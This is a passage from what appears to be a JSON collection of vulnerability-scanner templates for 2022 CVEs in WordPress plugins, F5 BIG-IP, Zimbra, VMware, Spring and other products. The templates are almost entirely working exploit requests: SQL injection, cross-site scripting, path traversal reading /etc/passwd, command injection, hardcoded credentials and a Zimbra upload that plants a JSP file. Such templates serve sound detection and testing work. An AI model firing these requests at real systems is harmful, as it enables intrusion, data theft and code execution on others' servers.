condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-2535","info":{"name":"SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"searchwp-live-search-result\")"],"condition":"and"}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25149","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 50s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 